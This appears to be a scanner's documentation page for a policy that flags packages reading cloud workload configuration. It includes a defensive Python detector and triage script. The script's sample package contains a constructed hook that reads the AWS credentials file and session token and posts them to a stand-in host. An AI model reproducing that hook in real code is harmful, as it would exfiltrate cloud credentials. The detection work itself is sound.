TH16130
Detected presence of software components that can access sensitive cloud workload configuration.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
| pass | high | high | None | None |
About the issue
Software components sometimes need to interact with sensitive parts of the runtime environment, often requiring privileged access to accomplish a task. Cloud workload configuration includes high-value information such as cloud provider credentials, environment variables containing secrets, and configuration files used by cloud and container orchestration tools (for example, the AWS credentials file, a kubeconfig file, or the Docker client configuration). That information is used by applications running in cloud and containerized environments. Attackers often abuse access to cloud workload configuration to harvest secrets from developer machines and build environments; the harvested secrets are then exfiltrated to attacker-controlled infrastructure and used to gain unauthorized access to cloud resources. While the presence of code that accesses cloud workload configuration does not necessarily imply malicious intent, every such use in a software package should be documented and approved. Only a small set of software components have a legitimate need for functions that read cloud workload configuration. One example of acceptable use is infrastructure-as-code tooling that must read credentials in order to provision or manage cloud resources on behalf of the developer.
How to resolve the issue
- Investigate reported detections as indicators of software tampering.
- Consult the MITRE ATT&CK documentation for T1580 - Cloud Infrastructure Discovery.
- Consider rewriting the flagged code without using the marked behaviors.
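To make the detection and the triage step concrete, the following is an added example written for this page; it is not Spectra Assure code and does not reproduce its rules. It scans a package's source files for the kinds of cloud workload configuration access described above (credential files, secret-bearing environment variables, the instance metadata endpoint) and then applies a simple heuristic for the investigation step: a file that both reads such configuration and makes outbound network calls is marked for review, while one that only reads it is marked for documentation and approval. The indicator list, the network-call pattern, and the sample package contents are all constructed for this example.

```python
"""Added example (not ReversingLabs / Spectra Assure code).

Flags source files that reference cloud workload configuration and
triages them by whether the same file also sends data over the network.
Indicator patterns and the sample package below are constructed for
illustration; a real engine uses far richer rules.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Each indicator is (name, regex). The paths, environment variable names
# and metadata addresses are real conventions; the grouping is this
# example's own choice.
INDICATORS = [
    ("aws-credentials-file", re.compile(r"\.aws[/\\](credentials|config)\b")),
    ("kubeconfig", re.compile(r"\.kube[/\\]config\b|\bKUBECONFIG\b")),
    ("docker-config", re.compile(r"\.docker[/\\]config\.json")),
    ("cloud-secret-env", re.compile(
        r"\b(AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN|AZURE_CLIENT_SECRET|"
        r"GOOGLE_APPLICATION_CREDENTIALS)\b")),
    ("instance-metadata", re.compile(
        r"169\.254\.169\.254|metadata\.google\.internal")),
]

# Crude signal for "this file can send data somewhere" (assumption:
# only a few common Python / JS call sites are listed).
NETWORK_SEND = re.compile(
    r"\b(urlopen|requests\.(post|put|get)|socket\.socket|http\.client|fetch)\b")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    indicator: str
    snippet: str


def scan_source(path: str, text: str) -> list[Finding]:
    """Return one Finding per (line, indicator) match in a single file."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(path, lineno, name, line.strip()))
    return findings


def scan_package(files: dict[str, str]) -> list[Finding]:
    """Scan every file of a package given as {path: contents}."""
    results: list[Finding] = []
    for path, text in files.items():
        results.extend(scan_source(path, text))
    return results


def triage(files: dict[str, str]) -> dict[str, str]:
    """Map each flagged file to a verdict for the investigation step.

    'needs-review': reads cloud configuration AND contains outbound
    network calls in the same file (harvest-then-exfiltrate shape).
    'document-and-approve': reads cloud configuration only.
    """
    verdicts: dict[str, str] = {}
    for path, text in files.items():
        if not scan_source(path, text):
            continue
        verdicts[path] = ("needs-review" if NETWORK_SEND.search(text)
                          else "document-and-approve")
    return verdicts


# Constructed sample package: a benign module plus a suspicious hook.
# 'example.invalid' is a reserved, non-resolving domain name.
SAMPLE_PACKAGE = {
    "pkg/__init__.py": "from .core import run\n",
    "pkg/core.py": (
        "import os\n"
        "def run():\n"
        "    return os.environ.get('HOME')\n"
    ),
    "pkg/setup_hook.py": (
        "import os, urllib.request\n"
        "creds = open(os.path.expanduser('~/.aws/credentials')).read()\n"
        "token = os.environ.get('AWS_SESSION_TOKEN')\n"
        "urllib.request.urlopen('http://example.invalid/c', data=creds.encode())\n"
    ),
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f"{f.path}:{f.line} [{f.indicator}] {f.snippet}")
    for path, verdict in triage(SAMPLE_PACKAGE).items():
        print(f"{path}: {verdict}")
```

Running the block reports two findings in `pkg/setup_hook.py` (the credentials file read and the session token lookup) and triages that file as `needs-review`, because the same file also calls `urlopen`. The benign `pkg/core.py`, which only reads `HOME`, produces nothing. The co-location heuristic is deliberately simple: a real investigation also follows the data across files and checks whether the package's stated purpose justifies the access at all.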
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total number of packages analyzed
- Linux: 562K
- NPM: 5.12M
- NuGet: 735K
- PS Gallery: 17K
- PyPI: 838K
- RubyGems: 203K
- VS Code: 113K
- Windows: 3.7K
Recommended reading
- Cloud Infrastructure Discovery (External resource)